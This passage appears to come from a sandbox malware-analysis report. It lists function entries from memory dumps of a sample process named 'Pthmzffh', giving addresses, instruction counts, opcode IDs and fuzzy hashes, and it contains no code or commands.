                                                                      • Opcode ID: bf53111e48238acdc53eb77c630db725d1c0b534f10b00690561931db2e96971
                                                                      • Instruction ID: 4c06de5517cb4cc104ac55a24cd7d194192f3b736f61c33b912af407d8fc4021
                                                                      • Opcode Fuzzy Hash: bf53111e48238acdc53eb77c630db725d1c0b534f10b00690561931db2e96971
                                                                      • Instruction Fuzzy Hash: 70E0EC79B2820BDF6B6D89BADC40A3673EE7B846513448979AA06CB145FA70D4428E90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F919C Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4fef404d58d03281c1d3ef9301c2e3f999a55064984ebf906350a8fe1aabd6bd
                                                                      • Instruction ID: 308852e2cdcb5b50512080103dbeb19d74685ca8c910cf7d848eca4137a81630
                                                                      • Opcode Fuzzy Hash: 4fef404d58d03281c1d3ef9301c2e3f999a55064984ebf906350a8fe1aabd6bd
                                                                      • Instruction Fuzzy Hash: 09E02675A0E0848FD7248BF85C545B17B75F95334174E49D5E804AB925E6198A07E700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F32EA Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3c0cdea3cb9193ca5214f62efc4452cf19155bf41b780340bb024c7a2bb1aa5d
                                                                      • Instruction ID: 33ea343422aa5fcd26903096e3c9c34678541fcc98d8d02bd6a1d4e4986f746f
                                                                      • Opcode Fuzzy Hash: 3c0cdea3cb9193ca5214f62efc4452cf19155bf41b780340bb024c7a2bb1aa5d
                                                                      • Instruction Fuzzy Hash: 71E01A76104159AFCF028E80DC01CEA7F26EF4A320B04804AFD144B262D7B28922EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71D601 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0099d15adc041113e8908b96d76c596d1d7a57e942cdb50afceb1eb74d5e1e73
                                                                      • Instruction ID: fc8b434c5191b0f71454e81316774ab09d52df6c74a57d0524dc4fef4836ee36
                                                                      • Opcode Fuzzy Hash: 0099d15adc041113e8908b96d76c596d1d7a57e942cdb50afceb1eb74d5e1e73
                                                                      • Instruction Fuzzy Hash: 61E0126190524CAFDB02DBB5988348D7BB8EA41504B2240EBD445DB152EA314B479792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71E0B0 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4fcf67e45adb170bb5b2324b35f0dc1b49047eb047a10d696964af1e0dfa4eb7
                                                                      • Instruction ID: 055e08a8377c5201c38fc11d903b5712c2543c0c7a6f65b83f7e164e77527df1
                                                                      • Opcode Fuzzy Hash: 4fcf67e45adb170bb5b2324b35f0dc1b49047eb047a10d696964af1e0dfa4eb7
                                                                      • Instruction Fuzzy Hash: 57E0C2B2905248AFEB02DBB098C24DD7BF4DA02504B1240E6C048CB112E9340F0797A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F6F67 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3d71f3c46fba8f622a4edaf349eeb5fdf6d4f14a043269d5635a529b4c6d7d59
                                                                      • Instruction ID: 4d0d5895038ac86c54c708d022b9ba0e264c82f6e4731b1939ab27c22082ebf7
                                                                      • Opcode Fuzzy Hash: 3d71f3c46fba8f622a4edaf349eeb5fdf6d4f14a043269d5635a529b4c6d7d59
                                                                      • Instruction Fuzzy Hash: 69E08676809288AFCF42DFF48811589BFB8DF47118B1985E7D504CB123EA314A15A791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71D70F Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2b32773e99c77dfcc76ee616bcd526412599ece4058076149ca174220baebc5
                                                                      • Instruction ID: 1b8440b7625f1eb0284d3fab259d90fca92ed515c6a97c960280c0a94fda0727
                                                                      • Opcode Fuzzy Hash: f2b32773e99c77dfcc76ee616bcd526412599ece4058076149ca174220baebc5
                                                                      • Instruction Fuzzy Hash: ACE0C2A284920CAFDB02DFF4A8824D9BFF5DB81200F1144EBD5899B531E9314B665383
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013A1197 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3278722b0b2fed19cc1be051bc190ce07fed90e5c4d08568e1fc57056fc90075
                                                                      • Instruction ID: 50e12b409ae2bd6169d39ab0d5e2bc764f9a05a0448cd2a17a2ec48955ac9f5d
                                                                      • Opcode Fuzzy Hash: 3278722b0b2fed19cc1be051bc190ce07fed90e5c4d08568e1fc57056fc90075
                                                                      • Instruction Fuzzy Hash: DEF0C275E01108CFEB00CF84D889A9CFBB6FB85304FA481A6E606AB620D330A990CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013AC188 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 24dabdd15e732cce9e4f663071a3d7b599c29e82d67b2128e6ed9fff9cdee675
                                                                      • Instruction ID: 46157f72e02a73f232bfd73410f6a05dccdb4a50cfdcd38fccba18e3658b013a
                                                                      • Opcode Fuzzy Hash: 24dabdd15e732cce9e4f663071a3d7b599c29e82d67b2128e6ed9fff9cdee675
                                                                      • Instruction Fuzzy Hash: C9D0A73A30812CA3D504115AB90187AB79ECBC66AA3C55437FA03C7B40CE297C1657F6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F54B1 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c357585bc2eb21505da0d5b9f2780cdc51d38e662478b66b17df2962ab3f4e92
                                                                      • Instruction ID: a89e9b35418ebe5332dedaeb1ee30e1c0e2cc582d756745e9a0c7e78d40c7208
                                                                      • Opcode Fuzzy Hash: c357585bc2eb21505da0d5b9f2780cdc51d38e662478b66b17df2962ab3f4e92
                                                                      • Instruction Fuzzy Hash: 4DE0C2F66081505FC302CB54EA10866BBE49E8AA10B18888EB480D7252D4A5DC03A732
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71A6D0 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b690ad4a56846c9a03d7c7b2b630a9e7fbde56c5b1b29348eacf875437e37dbc
                                                                      • Instruction ID: 20ffafa38fa25d140e50c5f953e8f0dfd7eec6fb4ed31b088e42cf94630a71a7
                                                                      • Opcode Fuzzy Hash: b690ad4a56846c9a03d7c7b2b630a9e7fbde56c5b1b29348eacf875437e37dbc
                                                                      • Instruction Fuzzy Hash: 39E0C26190A20CAFDB02DFF488824D97BB4DB02104B2140EBC484DB111E9300B435391
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71F1E8 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 066f88f04e64f424d13d64a31e7490f930ef8989c5564b7c45c57087e9ba941c
                                                                      • Instruction ID: 7b8865147d97226259abd696db603fa73ddfc0e8ea139f1f53a74c9563cb5dae
                                                                      • Opcode Fuzzy Hash: 066f88f04e64f424d13d64a31e7490f930ef8989c5564b7c45c57087e9ba941c
                                                                      • Instruction Fuzzy Hash: CED05E751087804FF306DA20EAA28A6BB71FBD670471AC88BE4A08B353DA219D07D761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71C198 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 418f01a3ccab87162470174f734504ac1055da9669872dce1d034823df534a24
                                                                      • Instruction ID: 0c0bdf16293c0dfac1d45e25b182e4dfa795ae716c9fb5182b2697a379bf211b
                                                                      • Opcode Fuzzy Hash: 418f01a3ccab87162470174f734504ac1055da9669872dce1d034823df534a24
                                                                      • Instruction Fuzzy Hash: D6E0C2E280924CAFDF01DFE4D9520CD7BB8DB01204B1144E6D449DF122EA314B029392
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013AD190 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd2c734f8f7d83a57358fd72e67bb081460405c048f1d2438e905a3b5ddd1e10
                                                                      • Instruction ID: 874da58861c945c8846c00a54170fcff3067e9452a42f24996df6f445844de4e
                                                                      • Opcode Fuzzy Hash: dd2c734f8f7d83a57358fd72e67bb081460405c048f1d2438e905a3b5ddd1e10
                                                                      • Instruction Fuzzy Hash: 74E0C27280210CAFCF00EBF089814C97BB4CA01108B2144E69108CB511E9324A075381
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013A7390 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 57f93f0e6da19893081bec8c597bd63de19cfb1c1184b3065f05590cfbcd7ff5
                                                                      • Instruction ID: 6f4770b43fbc3e3f395541d4a113668c3b3efd88bbf2a2f1568a86ab6ae0bf62
                                                                      • Opcode Fuzzy Hash: 57f93f0e6da19893081bec8c597bd63de19cfb1c1184b3065f05590cfbcd7ff5
                                                                      • Instruction Fuzzy Hash: 79E0C275909309EFDB12CBB4D9810DDBBF6DA01104B2145E7C048DB161D9304A425781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F3420 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 947e680d531c1748aa60ebfe57d75d536eb97c3c2911234d613904af61f59156
                                                                      • Instruction ID: 932035b8a3f84d899d814a57564d98cc48c5c589a0d3be51ec65bc873d5e6f8d
                                                                      • Opcode Fuzzy Hash: 947e680d531c1748aa60ebfe57d75d536eb97c3c2911234d613904af61f59156
                                                                      • Instruction Fuzzy Hash: 8EE0ECB590524CAFCB11DFA4D8514DA7FB8EE06208B2105EAD508DB512EA324A15A792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F7648 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e0c895b28aae44549148ca5e005e659302934cb9ca55c1489f6de4e57da1ce4e
                                                                      • Instruction ID: 0b40e510eae6c13c201ed109a8c23b52de935732aa79684277457feac8a5a4cf
                                                                      • Opcode Fuzzy Hash: e0c895b28aae44549148ca5e005e659302934cb9ca55c1489f6de4e57da1ce4e
                                                                      • Instruction Fuzzy Hash: 4BE08CB560C2506FC302CB40E911866BFA19BCA620709888FF840A7253C5A28D0BEB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F7778 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f20e6d7dad1ce539357f2ffb00d873367659bc8b707de758677a4e6d39de8bfe
                                                                      • Instruction ID: 500fa5bf89fdc5bd3f19593e6072dba3e23719355c5074c00cc0c18d07d11c81
                                                                      • Opcode Fuzzy Hash: f20e6d7dad1ce539357f2ffb00d873367659bc8b707de758677a4e6d39de8bfe
                                                                      • Instruction Fuzzy Hash: 03E0C2A2D0828CAFCB02CFE4882148E7FFCDE0B104B1544EBD444DB123E9324A01A3A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F53B8 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3de247adacc93bc26c7ba5f939e5b4002d80271d1ddcc4557064b03ac9c6d539
                                                                      • Instruction ID: 5753db6a7d40a0f854d997f2228d2ffc94a4b25a92f594b0ce1a4176c7c5374d
                                                                      • Opcode Fuzzy Hash: 3de247adacc93bc26c7ba5f939e5b4002d80271d1ddcc4557064b03ac9c6d539
                                                                      • Instruction Fuzzy Hash: 1ED02B325082410FD310C654D8419E2B7A5EFCB214B18889FE051D3246DE68CC07D370
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71EEC0 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a11c40872e58a49610d6055c151b932cffbef7eac9536bd4b6781f81990b13f2
                                                                      • Instruction ID: f4bd70311ae57c4d812871963fc0eeebc7c04d1ebdad1196a46b110e90cdc92f
                                                                      • Opcode Fuzzy Hash: a11c40872e58a49610d6055c151b932cffbef7eac9536bd4b6781f81990b13f2
                                                                      • Instruction Fuzzy Hash: C0E0C2B2D0A24CAFCF01DBA48C404C97BB8EB12114B1442E6D415DF1A2EA314B02A791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013A502F Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e177e150f2767dcac5bc6e3e7541fa8a7e1db316c1961fe40762e725667a80f3
                                                                      • Instruction ID: e37037bdbb90778b8d84a8e40b4f6e13454efa636cc89b0cb7c02dc02fa6430a
                                                                      • Opcode Fuzzy Hash: e177e150f2767dcac5bc6e3e7541fa8a7e1db316c1961fe40762e725667a80f3
                                                                      • Instruction Fuzzy Hash: 8FE08C32849208EFCB01DFA488208DD3FB6DE01204B1380E6E948DB1A1DA304B449791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013A83A8 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 064a828cae67669cca5aef30df419d472a5c3a753e5f81b56035e69694ffd550
                                                                      • Instruction ID: fbce7b8b115cf3dda535d649d758944cb309e6983a5c343069932e494f9bf5a2
                                                                      • Opcode Fuzzy Hash: 064a828cae67669cca5aef30df419d472a5c3a753e5f81b56035e69694ffd550
                                                                      • Instruction Fuzzy Hash: 73D05BB56081105FD305CF44F591C9AB7F2DFD5A14709C49FE48457362D6319C07CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013AC281 Relevance: .0, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b520abb0d72079ce4c5c29fbe5fe97ea9d185df4afbfd3ae4c73230f64a1b60
                                                                      • Instruction ID: 6ef92c671faca4add1196aaa873eaddf36989ca797828b2732fefce6c8138dc3
                                                                      • Opcode Fuzzy Hash: 5b520abb0d72079ce4c5c29fbe5fe97ea9d185df4afbfd3ae4c73230f64a1b60
                                                                      • Instruction Fuzzy Hash: F6E0C27284920CEFEB01CBA499910DD7BE6DA8520471241EBD008DB662E9310B029341
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F2288 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f67b88b0622382c7ea34de7e155fad27074cd66fc9d9769bd8d1d18a0cb6ca8a
                                                                      • Instruction ID: 4ae56635d5a435666d3b01807dd953ea2cf75a1b626db62913e5a145d9182e49
                                                                      • Opcode Fuzzy Hash: f67b88b0622382c7ea34de7e155fad27074cd66fc9d9769bd8d1d18a0cb6ca8a
                                                                      • Instruction Fuzzy Hash: 32D017791082906FD705CA04E85289ABB65EBDB714705988EF89847253C6229C07D7A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013AF020 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc4f8dcae32e46592fb3f2422a5f84528fbe29137cb8fd914530ead20e3253c7
                                                                      • Instruction ID: ce360b6f315fbe03076108d804a473354e993af617b6c30bd5b376d0798a0065
                                                                      • Opcode Fuzzy Hash: fc4f8dcae32e46592fb3f2422a5f84528fbe29137cb8fd914530ead20e3253c7
                                                                      • Instruction Fuzzy Hash: 4AE01275608242AFE306CB14E992865BBA1EBC5614B06848EE49457262C6629C07C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 013A8011 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.517793346.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_13a0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5279bd70924ad09f7a203f8c716b383ff5bbdde3641e4194f8d9ff0d39f7284
                                                                      • Instruction ID: 09063fca9926738c31b6e55657b29c92dcdb1b2ec426267ad755c3e110468b25
                                                                      • Opcode Fuzzy Hash: e5279bd70924ad09f7a203f8c716b383ff5bbdde3641e4194f8d9ff0d39f7284
                                                                      • Instruction Fuzzy Hash: 9AE0C2B194A24CAFDB06DFB4C8015897FB9DB43100F0140E6D245DB162E9310A059392
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F9140 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 45cf85d0fb1386aaefa99b344014796b6cb4a1ecd5acd3ad25caa9a806bbc576
                                                                      • Instruction ID: 228693359c516ede90500c27143f6a5214474b3601329df4bce9a87598c7b721
                                                                      • Opcode Fuzzy Hash: 45cf85d0fb1386aaefa99b344014796b6cb4a1ecd5acd3ad25caa9a806bbc576
                                                                      • Instruction Fuzzy Hash: 0EE0C230A0020CEFCB00DFF4D8406ADB3FAEB44305F4088A9D804A7604DE355F00AB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F6C68 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71b81e51b4f7bd337c039bb5d4939cd3ec2fd814a802e7e8b453ca9205c3d52d
                                                                      • Instruction ID: 3bbe902b7afaf165b01dd5a3904f239a6e5d51525fc2e757edba037b2c6e7dd9
                                                                      • Opcode Fuzzy Hash: 71b81e51b4f7bd337c039bb5d4939cd3ec2fd814a802e7e8b453ca9205c3d52d
                                                                      • Instruction Fuzzy Hash: B8D0A9F8A451407FC74282208801889BFA4AEAB322B16948AE8088A103EAB18907B320
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C5F90F8 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 04c3532cdfce36e978df42d773e41a8936a701a08d549613b63c45da315c2b0c
                                                                      • Instruction ID: def49159f4c5042795766d6da1d67ab80474db246ed32da0a3621839d4bb7f52
                                                                      • Opcode Fuzzy Hash: 04c3532cdfce36e978df42d773e41a8936a701a08d549613b63c45da315c2b0c
                                                                      • Instruction Fuzzy Hash: BFE01270A0420DEFCB40EFE4D54059D77B9EB45305F1049A9D808D3700DE755F509B95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71C741 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ec70d544830e443ada2b3de77a337edbb256e562c9a9bae75ce6698c13d4de8d
